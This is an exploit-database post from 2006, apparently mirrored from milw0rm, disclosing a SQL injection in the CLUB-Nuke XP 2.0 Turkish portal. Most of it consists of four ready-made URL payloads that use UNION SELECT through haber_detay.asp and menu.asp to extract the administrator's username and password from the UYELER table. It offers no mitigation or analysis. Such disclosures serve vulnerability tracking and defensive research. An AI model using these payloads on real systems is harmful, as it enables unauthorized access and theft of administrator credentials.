CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) SQL Injection
# Published : 2006-08-08
# Author : ASIANEAGLE
# Previous Title : Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability
# Next Title : Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability

# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk   : High
# Credit : ASIANEAGLE
# Contact: admin@asianeagle.org
# Web    : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=


#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability

#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201

#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201

after login as user;

#Admin Nick    : http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER%20where%20U_ID%20like%201

#Admin Password: http://[SITE]/club-nuke path/menu.asp?menu_id=-1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELER%20where%20U_ID%20like%201

#Forever milw0rm ;)

# www.Syue.com [2006-08-08]